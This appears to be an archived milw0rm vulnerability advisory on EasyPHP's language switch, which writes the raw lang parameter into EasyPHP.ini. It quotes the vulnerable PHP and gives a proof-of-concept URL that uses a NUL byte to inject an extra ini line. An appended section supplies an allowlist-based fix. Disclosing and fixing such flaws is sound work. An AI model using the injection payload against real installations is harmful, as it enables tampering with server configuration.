Bug : Arbitrary Modify Configuration File
Vendor : EasyPHP
Vendor URI : http://sourceforge.net/projects/quickeasyphp/
Product : EasyPHP 2.0
Author : Zigma [zigmatn @ gmail.com]
http://NullArea.NET

Description :

EasyPHP is a WAMP software bundle that installs web server services on a Windows computer and allows quick-and-easy development of PHP and MySQL applications on localhost (also known as 127.0.0.1).
The package includes an Apache server, a MySQL database, and the PHP extension.

[+] Analysis :

A quick look at i18n.inc

if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
{
    // Read the current contents of the configuration file.
    $fp = fopen($filename, "r");
    $ini_contents = fread($fp, filesize($filename));
    fclose($fp);

    // The raw request value is spliced into the file contents unchecked.
    $ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); // <--

    // Write the modified contents back to the configuration file.
    $fp = fopen($filename, "w");
    fputs($fp, $ini_contents);
    fclose($fp);

    Header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

EasyPHP does not validate user input (the lang parameter), which allows an arbitrary overwrite of the EasyPHP configuration file (EasyPHP.ini).

[+] Proof Of Concept :

The request :

http://localhost/index.php?lang=fr%00Lang=Overwritten

results in EasyPHP.ini being overwritten, adding the string "Lang=Overwritten".
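
A hardened form of the language switch, as an added example that is not part of the original advisory or of EasyPHP's own code: the requested value is checked against a fixed allowlist before anything is written, and only the LangAdmin line is replaced. The function name set_admin_language(), the ALLOWED_LANGS list and the sample ini contents are assumptions.

```php
<?php
// Added example (not EasyPHP code): allowlist-validated language switch.
// ALLOWED_LANGS, set_admin_language() and the sample ini are assumptions.

const ALLOWED_LANGS = ['en', 'fr', 'de', 'es'];

/**
 * Update LangAdmin in the ini file only if $requested is an allowlisted code.
 * Returns true when the file was rewritten, false when the input was rejected
 * or nothing changed.
 */
function set_admin_language(string $iniPath, string $requested): bool
{
    // Strict comparison against fixed values: NUL bytes, CR/LF, '=' and any
    // other ini metacharacters can never pass this check.
    if (!in_array($requested, ALLOWED_LANGS, true)) {
        return false;
    }

    $contents = file_get_contents($iniPath);
    if ($contents === false) {
        return false;
    }

    // Replace only the value of the LangAdmin key, anchored to the line start.
    $updated = preg_replace('/^LangAdmin=[^\r\n]*/m', 'LangAdmin=' . $requested, $contents, 1, $count);
    if ($updated === null || $count !== 1 || $updated === $contents) {
        return false;
    }

    // Write under an exclusive lock so concurrent requests cannot interleave.
    return file_put_contents($iniPath, $updated, LOCK_EX) !== false;
}

// Constructed sample configuration, written to a temp file so this runs offline.
$ini = tempnam(sys_get_temp_dir(), 'ini');
file_put_contents($ini, "[EasyPHP]\nLangAdmin=en\nLang=en\n");

var_dump(set_admin_language($ini, "fr\0Lang=Overwritten")); // PoC value, URL-decoded
var_dump(set_admin_language($ini, 'fr'));                   // allowlisted value
echo file_get_contents($ini);
unlink($ini);
```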

# milw0rm.com [2009-05-11]
EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability
Zigma
05/11/2009